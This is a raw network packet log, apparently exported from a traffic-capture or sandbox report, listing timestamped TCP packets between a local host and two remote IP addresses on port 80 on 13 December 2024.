                                                                                                                                                                                                Dec 13, 2024 08:20:09.431032896 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.431087971 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.431153059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.431229115 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.431938887 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.431982040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.432039976 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.432080030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.432925940 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.432972908 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.433039904 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.433118105 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434006929 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434021950 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434055090 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434081078 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434936047 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.434979916 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.435008049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.435045958 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.435904026 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.435951948 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.435981035 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.436018944 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.436903954 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.436955929 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.437012911 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.437048912 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.437876940 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.437922001 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.437995911 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.438035965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.438827038 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.438868046 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.438931942 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.438997030 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.439802885 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.439874887 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.439933062 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.439970970 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.440808058 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.440860987 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.440903902 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.440943003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.441761971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.441807985 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457447052 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457515955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457519054 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457561016 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457657099 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457700014 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457755089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.457796097 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.458650112 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.458697081 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.458744049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.458786964 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.459650993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.459672928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.459717989 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.459745884 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.460635900 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.460685968 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.460724115 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.460766077 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.461592913 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.461643934 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.461683989 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.461723089 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.462548971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.462594986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.462642908 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.462683916 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.463490963 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.463536978 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589184046 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589214087 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589375973 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589596987 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589677095 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589777946 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589831114 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589835882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.589900970 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.590749979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.590812922 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.590878010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.590924978 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.591773987 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.591820955 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.591866970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.591912985 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.592730045 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.592784882 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.592856884 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.592897892 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.593715906 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.593760967 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.593805075 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.593839884 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.594671011 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.594716072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.594808102 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.594847918 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.595675945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.595730066 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.595810890 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.595849037 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.596685886 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.596733093 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.596739054 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.596774101 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.597650051 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.597726107 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.597735882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.597774029 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.598639011 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.598684072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.598730087 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.598771095 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.599618912 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.599669933 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.599699974 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.599741936 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.600568056 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.600613117 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.600677013 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.600733042 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.601591110 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.601634026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.601872921 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.601934910 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.602572918 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.602616072 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.602663994 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.602663994 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.603523970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.603590965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.603621006 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.603674889 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.604510069 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.604562998 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.604620934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.604662895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.605463982 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.605509043 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.605583906 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.605623007 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.606463909 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.606508017 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.606542110 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.606626034 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.607441902 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.607485056 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.607527971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.607584953 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.608452082 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.608517885 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.608551979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.608594894 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.609457016 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.609533072 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.609591961 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.609647036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.610399008 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.610445023 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.610512018 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.610553026 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.611347914 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.611392021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.611475945 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.611520052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:09.612314939 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:09.612364054 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326481104 CET8049946185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326508999 CET8049947185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326543093 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:10.326575994 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:10.785655975 CET8049948185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:10.785686016 CET8049948185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:10.786746979 CET4994880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:10.797636986 CET4994880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:10.904953003 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:10.917308092 CET8049948185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:11.024804115 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:11.024910927 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:11.025093079 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:11.145275116 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:11.145339012 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:11.265137911 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.266891956 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.266983032 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.431687117 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.431715965 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.432085037 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:12.432110071 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.432346106 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:12.432589054 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.462105036 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.462158918 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.462269068 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.463535070 CET4995280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.551543951 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.551867008 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552002907 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552006960 CET8049947185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552069902 CET4994780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552095890 CET8049959185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552150965 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552287102 CET8049960185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552331924 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552671909 CET8049946185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.552719116 CET4994680192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556629896 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556843042 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:12.556938887 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.574886084 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.583293915 CET8049952185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.676486969 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.676511049 CET8049959185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.676634073 CET8049960185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.694705009 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.694849968 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.694921970 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.814784050 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:12.815011978 CET4996180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:12.934860945 CET8049961185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878407955 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878423929 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878631115 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878638029 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878644943 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878705025 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878705025 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878715038 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878729105 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878916979 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878930092 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878942013 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878954887 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878983021 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878983021 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.878983021 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.879244089 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893122911 CET8049959185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893241882 CET4995980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893367052 CET8049960185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.893444061 CET4996080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.998455048 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.998578072 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:13.998960972 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:13.998960972 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.002608061 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.002855062 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.070815086 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.070842981 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.071018934 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.074846029 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.074908972 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.074959040 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.075006962 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.083400011 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.083616018 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.086340904 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.086359978 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.086395979 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.086600065 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.094661951 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.094721079 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.094742060 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.094786882 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.103184938 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.103221893 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.103293896 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.103293896 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.111772060 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.111793995 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.111835957 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.111999989 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.119889021 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.119951010 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.120029926 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.120234013 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.128344059 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.128384113 CET8049958185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:14.128526926 CET4995880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:14.128526926 CET4995880192.168.2.11185.81.68.147
